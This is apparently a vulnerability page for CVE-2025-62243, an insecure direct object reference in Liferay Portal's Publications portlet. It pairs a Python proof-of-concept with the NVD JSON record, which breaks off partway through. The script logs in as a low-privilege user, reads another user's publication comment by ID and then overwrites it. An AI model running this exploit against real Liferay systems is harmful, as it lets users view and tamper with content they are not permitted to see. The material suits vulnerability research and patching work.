CVE-2025-62243

# CVE-2025-62243 - Liferay Portal Publications IDOR PoC # Vulnerability: Insecure Direct Object Reference in Publications Portlet # Affected Parameter: _com_liferay_change_tracking_web_portlet_PublicationsPortlet_value import requests # Target configuration TARGET_URL = "https://target-liferay-instance.com" LOGIN_URL = f"{TARGET_URL}/c/portal/login" PUBLICATIONS_URL = f"{TARGET_URL}/web/guest/publications" # Attacker credentials (low-privilege account) USERNAME = "attacker_user" PASSWORD = "attacker_password" # Target publication comment ID (obtained through enumeration or other means) TARGET_COMMENT_ID = "12345" # Step 1: Authenticate to Liferay Portal session = requests.Session() login_payload = { "_com_liferay_login_web_portlet_LoginPortlet_formDate": "", "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false", "_com_liferay_login_web_portlet_LoginPortlet_redirect": "", "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false", "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME, "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD, "_com_liferay_login_web_portlet_LoginPortlet_checkboxRememberMe": "false" } response = session.post(LOGIN_URL, data=login_payload, verify=False) print(f"[*] Login response status: {response.status_code}") # Step 2: Exploit IDOR to view publication comment # The vulnerable parameter allows direct reference to any publication comment exploit_params = { "p_p_id": "com_liferay_change_tracking_web_portlet_PublicationsPortlet", "p_p_lifecycle": "0", "p_p_state": "normal", "p_p_mode": "view", "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName": "/change_tracking/view_ct_comment", "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value": TARGET_COMMENT_ID } response = session.get(PUBLICATIONS_URL, params=exploit_params, verify=False) print(f"[*] IDOR exploitation response status: {response.status_code}") print(f"[*] Response body: {response.text[:500]}") # Step 3: Edit publication comment via crafted URL (if needed) edit_payload = { "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName": "/change_tracking/edit_ct_comment", "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_value": TARGET_COMMENT_ID, "_com_liferay_change_tracking_web_portlet_PublicationsPortlet_comment": "Modified by attacker via IDOR" } response = session.post(PUBLICATIONS_URL, data=edit_payload, verify=False) print(f"[*] Comment modification response status: {response.status_code}") print("[+] IDOR exploitation completed successfully")

{"cve": {"id": "CVE-2025-62243", "sourceIdentifier": "[email protected]", "published": "2025-10-13T18:15:35.160", "lastModified": "2025-12-15T17:54:02.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure direct object reference (IDOR) vulnerability in Publications in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 allows remote authenticated attackers to view publication comments via the _com_liferay_change_tracking_web_portlet_PublicationsPortlet_value parameter.\n\nPublications comments in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 GA through update 92 does not properly check user permissions, which allows remote authenticated users to edit publication comments via crafted URLs."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:-:*:*:*:*:*:*", "matchCriteriaId": "96E84DBC-C740-4E23-8D1D-83C8AE49813E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update1:*:*:*:*:*:*", "matchCriteriaId": "8B1B2384-764F-43CC-8206-36DCBE9DDCBF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update10:*:*:*:*:*:*", "matchCriteriaId": "C7B02106-D5EA-4A59-A959-CCE2AC8F55BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update11:*:*:*:*:*:*", "matchCriteriaId": "80204464-5DC5-4A52-B844-C833A96E6BD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update12:*:*:*:*:*:*", "matchCriteriaId": "6F8A5D02-0B45-4DA9-ACD8-42C1BFF62827"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update13:*:*:*:*:*:*", "matchCriteriaId": "38DA7C99-AC2C-4B9A-B611-4697159E1D79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update14:*:*:*:*:*:*", "matchCriteriaId": "F264AD07-D105-4F00-8920-6D8146E4FA63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:update15:*:*:*:*:*:*", "matchCriteriaId": "C929CF16-4725-492A-872B-0928FE388FC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digit ... (truncated)